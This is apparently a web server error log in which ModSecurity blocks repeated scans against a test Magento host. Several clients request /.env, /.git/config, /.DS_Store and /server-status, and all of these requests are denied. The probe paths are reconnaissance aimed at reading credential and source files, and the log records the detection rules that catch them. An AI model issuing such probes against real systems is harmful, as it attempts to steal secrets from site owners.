[Thu Nov 06 20:34:08.633709 2025] [:error] [pid 4061967] [client 138.68.86.32:42650] [client 138.68.86.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQz4MMxOA9xCcE2G5RBzLwAAAAI"]
[Thu Nov 06 20:34:08.796852 2025] [:error] [pid 4053639] [client 138.68.86.32:42662] [client 138.68.86.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQz4MKh14EGMkZWBLRpPMwAAAAQ"]
[Thu Nov 06 20:34:08.797062 2025] [:error] [pid 4053639] [client 138.68.86.32:42662] [client 138.68.86.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQz4MKh14EGMkZWBLRpPMwAAAAQ"]
[Thu Nov 06 20:34:08.797237 2025] [:error] [pid 4053639] [client 138.68.86.32:42662] [client 138.68.86.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQz4MKh14EGMkZWBLRpPMwAAAAQ"]
[Thu Nov 06 22:44:09.772378 2025] [authz_core:error] [pid 4064600] [client 209.38.248.17:47310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Nov 06 22:44:11.735937 2025] [:error] [pid 4064598] [client 209.38.248.17:35736] [client 209.38.248.17] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ0Wq287tq2H_wSf-H8uhwAAABA"]
[Thu Nov 06 22:44:11.737051 2025] [:error] [pid 4064598] [client 209.38.248.17:35736] [client 209.38.248.17] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ0Wq287tq2H_wSf-H8uhwAAABA"]
[Thu Nov 06 22:44:11.737291 2025] [:error] [pid 4064598] [client 209.38.248.17:35736] [client 209.38.248.17] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ0Wq287tq2H_wSf-H8uhwAAABA"]
[Thu Nov 06 22:44:12.270474 2025] [:error] [pid 4064629] [client 209.38.248.17:35748] [client 209.38.248.17] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ0WrMCO64WtBPLoO1OkhgAAABo"]
[Thu Nov 06 22:44:12.270716 2025] [:error] [pid 4064629] [client 209.38.248.17:35748] [client 209.38.248.17] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ0WrMCO64WtBPLoO1OkhgAAABo"]
[Thu Nov 06 22:44:12.270930 2025] [:error] [pid 4064629] [client 209.38.248.17:35748] [client 209.38.248.17] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ0WrMCO64WtBPLoO1OkhgAAABo"]
[Thu Nov 06 22:44:12.610659 2025] [:error] [pid 4064594] [client 209.38.248.17:35750] [client 209.38.248.17] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ0WrMRVKnBaeDofarfVdwAAAAk"]
[Thu Nov 06 22:44:12.610927 2025] [:error] [pid 4064594] [client 209.38.248.17:35750] [client 209.38.248.17] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ0WrMRVKnBaeDofarfVdwAAAAk"]
[Thu Nov 06 22:44:12.611138 2025] [:error] [pid 4064594] [client 209.38.248.17:35750] [client 209.38.248.17] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ0WrMRVKnBaeDofarfVdwAAAAk"]
[Sat Nov 08 10:31:39.326212 2025] [authz_core:error] [pid 4102570] [client 139.59.132.8:54508] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Nov 08 10:31:39.653799 2025] [:error] [pid 4102568] [client 139.59.132.8:54538] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ8N-xn0F2RI2-cTfSgfAgAAAAo"]
[Sat Nov 08 10:31:39.654041 2025] [:error] [pid 4102568] [client 139.59.132.8:54538] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ8N-xn0F2RI2-cTfSgfAgAAAAo"]
[Sat Nov 08 10:31:39.654224 2025] [:error] [pid 4102568] [client 139.59.132.8:54538] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ8N-xn0F2RI2-cTfSgfAgAAAAo"]
[Sat Nov 08 10:31:39.740637 2025] [:error] [pid 4095017] [client 139.59.132.8:54542] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ8N-5JJLKyS8kHxF5TU8wAAAAQ"]
[Sat Nov 08 10:31:39.740875 2025] [:error] [pid 4095017] [client 139.59.132.8:54542] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ8N-5JJLKyS8kHxF5TU8wAAAAQ"]
[Sat Nov 08 10:31:39.741052 2025] [:error] [pid 4095017] [client 139.59.132.8:54542] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ8N-5JJLKyS8kHxF5TU8wAAAAQ"]
[Sat Nov 08 10:31:39.838635 2025] [:error] [pid 4103431] [client 139.59.132.8:54546] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ8N--aNV4JD36fly5Hx-QAAAAI"]
[Sat Nov 08 10:31:39.838885 2025] [:error] [pid 4103431] [client 139.59.132.8:54546] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ8N--aNV4JD36fly5Hx-QAAAAI"]
[Sat Nov 08 10:31:39.839052 2025] [:error] [pid 4103431] [client 139.59.132.8:54546] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ8N--aNV4JD36fly5Hx-QAAAAI"]
[Sat Nov 08 15:06:43.385193 2025] [authz_core:error] [pid 4099466] [client 206.81.24.74:50150] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Nov 08 15:06:44.183064 2025] [:error] [pid 4095013] [client 206.81.24.74:50176] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ9OdAL2_mVywaxmP86mAQAAAAA"]
[Sat Nov 08 15:06:44.183312 2025] [:error] [pid 4095013] [client 206.81.24.74:50176] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ9OdAL2_mVywaxmP86mAQAAAAA"]
[Sat Nov 08 15:06:44.183497 2025] [:error] [pid 4095013] [client 206.81.24.74:50176] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQ9OdAL2_mVywaxmP86mAQAAAAA"]
[Sat Nov 08 15:06:44.303631 2025] [:error] [pid 4095049] [client 206.81.24.74:50180] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ9OdOggqO9W6iUKFC4g3QAAAAU"]
[Sat Nov 08 15:06:44.303840 2025] [:error] [pid 4095049] [client 206.81.24.74:50180] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ9OdOggqO9W6iUKFC4g3QAAAAU"]
[Sat Nov 08 15:06:44.304005 2025] [:error] [pid 4095049] [client 206.81.24.74:50180] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ9OdOggqO9W6iUKFC4g3QAAAAU"]
[Sat Nov 08 15:06:44.391006 2025] [:error] [pid 4108950] [client 206.81.24.74:50182] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ9OdBtZ9MRCsxxeZlj1tAAAAAE"]
[Sat Nov 08 15:06:44.391312 2025] [:error] [pid 4108950] [client 206.81.24.74:50182] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ9OdBtZ9MRCsxxeZlj1tAAAAAE"]
[Sat Nov 08 15:06:44.391530 2025] [:error] [pid 4108950] [client 206.81.24.74:50182] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ9OdBtZ9MRCsxxeZlj1tAAAAAE"]
[Sun Nov 09 01:36:09.312703 2025] [:error] [pid 4118590] [client 3.85.61.56:38832] [client 3.85.61.56] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ_h-TKrY3ZHgQPPeNRXJQAAAAM"]
[Sun Nov 09 01:36:09.313015 2025] [:error] [pid 4118590] [client 3.85.61.56:38832] [client 3.85.61.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ_h-TKrY3ZHgQPPeNRXJQAAAAM"]
[Sun Nov 09 01:36:09.313171 2025] [:error] [pid 4118590] [client 3.85.61.56:38832] [client 3.85.61.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQ_h-TKrY3ZHgQPPeNRXJQAAAAM"]
[Mon Nov 10 13:01:33.375390 2025] [authz_core:error] [pid 4146479] [client 146.190.63.48:48308] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Nov 10 13:01:35.031754 2025] [:error] [pid 4148291] [client 146.190.63.48:48336] [client 146.190.63.48] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRHUH4No28sAq1BGyvWMegAAAAg"]
[Mon Nov 10 13:01:35.031996 2025] [:error] [pid 4148291] [client 146.190.63.48:48336] [client 146.190.63.48] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRHUH4No28sAq1BGyvWMegAAAAg"]
[Mon Nov 10 13:01:35.032177 2025] [:error] [pid 4148291] [client 146.190.63.48:48336] [client 146.190.63.48] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRHUH4No28sAq1BGyvWMegAAAAg"]
[Mon Nov 10 13:01:35.541284 2025] [:error] [pid 4146483] [client 146.190.63.48:48350] [client 146.190.63.48] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRHUHzpnbFjtMU_AVy8HjgAAAAQ"]
[Mon Nov 10 13:01:35.541493 2025] [:error] [pid 4146483] [client 146.190.63.48:48350] [client 146.190.63.48] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRHUHzpnbFjtMU_AVy8HjgAAAAQ"]
